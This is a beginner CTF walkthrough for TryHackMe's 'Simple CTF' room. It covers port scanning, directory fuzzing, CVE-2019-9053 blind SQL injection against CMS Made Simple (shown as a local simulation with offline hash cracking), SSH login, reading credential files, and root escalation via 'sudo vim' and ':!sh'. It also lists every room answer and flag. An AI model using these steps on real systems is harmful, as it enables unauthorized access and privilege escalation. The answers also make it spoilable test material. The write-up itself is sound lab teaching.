Writeup: Try Hack Me — Simple CTF
Simple CTF is a beginner-level CTF room on TryHackMe (https://tryhackme.com/room/easyctf).
Join the room and deploy the machine by pressing the deploy button.
While the machine boots and its IP appears, make sure you are connected to the TryHackMe network over OpenVPN.
Once that is done, let's start on the machine.
The first thing to check is which ports are open. Each open port is a service exposed to the network, and those services are where the vulnerabilities we need are most likely to be. Run nmap against the target to enumerate them (-sS is a SYN scan, -sC runs the default NSE scripts, -p- covers all 65535 TCP ports):
sudo nmap -sC -sS -p- 10.10.56.215 > nmap_scan
We observe three open ports: FTP on 21, HTTP on 80 and SSH on 2222. One caveat: without -sV, nmap names each service from its port-number table rather than from the banner, so a non-standard port such as 2222 can show up under a generic name; adding -sV (or simply connecting to the port) confirms it is SSH.
The results of this scan help us answer the first 2 questions:
#1: How many services are running under port 1000? — 2
#2: What is running on the higher port? — ssh
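Answering the first two questions from a scan file rather than by eye is a habit worth keeping, and it also makes the -sV caveat concrete. The parser below is an added example and is not code from the original post: it reads nmap grepable (-oG) output, keeps only open ports, and compares a scan without -sV to one with it. Both sample scans are constructed for this example; the version strings in the second one are placeholders, not findings from the box.

```python
import re

# Constructed sample of nmap grepable (-oG) output for a host like the one above.
# Without -sV the service column is nmap's guess from its port-number table,
# which is why 2222 shows a generic name instead of ssh.
SAMPLE_NO_VERSION = (
    "# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: "
    "nmap -sS -p- -oG nmap_scan 10.10.56.215\n"
    "Host: 10.10.56.215 ()\tStatus: Up\n"
    "Host: 10.10.56.215 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, "
    "2222/open/tcp//EtherNetIP-1///\tIgnored State: closed (65532)\n"
)

# The same host scanned with -sV (constructed; version strings are placeholders).
SAMPLE_WITH_VERSION = (
    "Host: 10.10.56.215 ()\tPorts: 21/open/tcp//ftp//vsftpd/, "
    "80/open/tcp//http//Apache httpd/, "
    "2222/open/tcp//ssh//OpenSSH/\tIgnored State: closed (65532)\n"
)

# One grepable port entry: port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_open_ports(grepable):
    """Return sorted (port, proto, service, version) tuples for every open port."""
    found = []
    for line in grepable.splitlines():
        # Only "Host:" lines carrying a "Ports:" field hold port data.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ports_field = line.split("Ports:", 1)[1].split("Ignored State", 1)[0]
        for port, state, proto, _owner, service, _rpc, version in PORT_RE.findall(ports_field):
            if state == "open":
                found.append((int(port), proto, service, version))
    return sorted(found)


def services_below(ports, limit):
    """Open ports numbered below `limit` (the room asks for 'under port 1000')."""
    return [p for p in ports if p[0] < limit]


def highest(ports):
    """The open port with the largest number, or None if nothing is open."""
    return max(ports) if ports else None


if __name__ == "__main__":
    for label, sample in (("no -sV", SAMPLE_NO_VERSION), ("with -sV", SAMPLE_WITH_VERSION)):
        ports = parse_open_ports(sample)
        print(label, "under 1000:", len(services_below(ports, 1000)),
              "highest:", highest(ports))
```

Run it against a real scan by writing the scan with -oG and passing the file contents to parse_open_ports. The grepable Ports field never carries NSE script output, so even with -sC the generic name on 2222 stays until -sV is added.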
The open FTP server was a red herring; it led to a dead end. So I'll not write about that here.
Port 80 is also open. Browsing to the IP shows the default Apache page, so we fuzz the URL for interesting endpoints (the wordlist can be found here). I've used ffuf; other tools like gobuster or dirbuster work as well. ffuf substitutes each wordlist entry wherever the FUZZ keyword appears in the URL, so the keyword has to be part of the target:
ffuf -u http://<ip>/FUZZ -w common.txt
Fuzzing turns up the /simple endpoint.
Browsing to /simple shows the homepage of CMS Made Simple. We search for well-known exploits against CMS Made Simple.
This leads us to CVE-2019-9053, an unauthenticated blind time-based SQL injection in the CMS Made Simple News module. Researching further turns up a Python script that automates the attack. All these resources can be found here (here). This helps us answer the next couple of questions:
#3 What’s the CVE you’re using against the application? — CVE-2019-9053
#4 To what kind of vulnerability is the application vulnerable? — SQLi
(Note: I was on a slow, irregular network, and most probably because of this the results of the script were inaccurate. I wasted a lot of time trying to figure out whether I was executing the script wrong, but in the end solved the problem by switching to a better network.)
#5 What’s the password? — secret
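The two pieces the exploit script automates are worth seeing in plain code: a time-based blind injection that leaks one character at a time through a LIKE 'prefix%' condition, and an offline crack of the recovered hash. The block below is an added example and is neither the public exploit nor code from this post. It assumes that CMS Made Simple stores passwords as md5(salt + password) with the salt held in the sitemask site preference, and it replaces the HTTP round trip and the response-time check with a local oracle() that answers from a constructed table (FAKE_SALT, FAKE_USER, FAKE_HASH are made up; the hash is built from the password "secret" only so the run ends where the room does). The SLEEP-based oracle on a real target is what makes the attack latency-sensitive: extra network delay is indistinguishable from SLEEP firing, which is the failure mode described in the note above.

```python
import hashlib
import string

# --- Constructed stand-in for the target database (nothing below came from the box).
# Assumption: CMS Made Simple keeps a per-site salt (the 'sitemask' preference in
# cms_siteprefs) and stores each user's password as md5(salt + password) in
# cms_users. Column names are simplified to a flat dict here.
FAKE_SALT = "3a2b1c"
FAKE_USER = "mitch"
FAKE_HASH = hashlib.md5((FAKE_SALT + "secret").encode()).hexdigest()
FAKE_DB = {"sitemask": FAKE_SALT, "username": FAKE_USER, "password": FAKE_HASH}

# Characters guessed one position at a time. '%' and '_' are LIKE wildcards and
# would make the oracle answer True for any row, so they are deliberately absent.
CHARSET = string.digits + string.ascii_lowercase + "@.-$"


def oracle(column, prefix):
    """Local stand-in for the time-based oracle (assumption: replaces the HTTP request).

    Against a real target this is where the crafted m1_idlist value goes out,
    carrying a condition shaped like
        ... AND (SELECT SLEEP(N) FROM <table> WHERE <column> LIKE 'prefix%')
    and the answer is "did the response take at least N seconds". MySQL's
    default collation makes LIKE case-insensitive, which lower() mirrors; a
    real salt can contain uppercase, so case must be disambiguated separately
    (BINARY in the condition, or trying case variants when cracking).
    """
    return FAKE_DB[column].lower().startswith(prefix.lower())


def extract(column, max_len=64):
    """Recover a column value character by character through the oracle.

    Each round appends one candidate to the known prefix and keeps the first
    one the oracle confirms. A round in which no candidate extends the prefix
    means the value is complete (or holds a character outside CHARSET, which
    would silently truncate the result).
    """
    known = ""
    for _ in range(max_len):
        for ch in CHARSET:
            if oracle(column, known + ch):
                known += ch
                break
        else:
            break
    return known


def crack(salted_hash, salt, wordlist):
    """Return the wordlist entry whose md5(salt + entry) matches, else None."""
    for candidate in wordlist:
        digest = hashlib.md5((salt + candidate).encode()).hexdigest()
        if digest == salted_hash:
            return candidate
    return None


def run():
    """Full flow: leak salt, username and hash, then crack the hash offline."""
    salt = extract("sitemask")
    user = extract("username")
    pw_hash = extract("password")
    # Constructed mini-wordlist standing in for rockyou or similar.
    password = crack(pw_hash, salt, ["password", "123456", "secret", "letmein"])
    return user, password


if __name__ == "__main__":
    print(run())
```

Each leaked character costs one confirmed request plus one request per rejected candidate, and every one of those must wait out the SLEEP delay, which is why a real run against a 32-character hash takes minutes and why a noisy link corrupts the result rather than merely slowing it.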
Now that we have a username (mitch) and its password (secret), let's try to SSH into the machine with them, remembering that SSH is on port 2222 rather than 22.
ssh mitch@<ip> -p 2222
This works and we are logged in as mitch, which answers the next question.
#6 Where can you login with the details obtained? — ssh
The next couple of steps are easy. Go to mitch's home directory, where the user flag sits; it answers the next question.
#7 What’s the user flag? — G00d j0b, keep up!
Move up one directory (to /home) and list its contents. There is an entry for another user, which answers the next question.
#8 Is there any other user in the home directory? What’s its name? — sunbath
Now we need the root flag, which means getting a root shell. Let's see how that can be done:
i. Running find / -user mitch
lists every file owned by mitch (not every file mitch can read). Nothing interesting turns up.
ii. Viewing /etc/passwd (nothing interesting), /etc/shadow (permission denied) and /etc/group (empty) yields nothing either.
iii. Let's see what mitch is allowed to run through sudo. Running sudo -l
lists the commands this user may execute as root:
Great. vim is among them, runnable as root. Since vim can launch shell commands, that is all we need; let's open any file as root.
#9 What can you leverage to spawn a privileged shell? — vim
sudo vim test.txt
To spawn a root shell from inside vim, type :!sh and press Enter (:shell does the same). sudo started vim as root, so the child shell is root as well. Navigate to /root in that shell and cat the root flag, which gives the answer to the final question.
#10 What’s the root flag? — W3ll d0n3. You made it!
This solves the room. Hope you learnt something new. Reach out in case of any doubts / difficulties.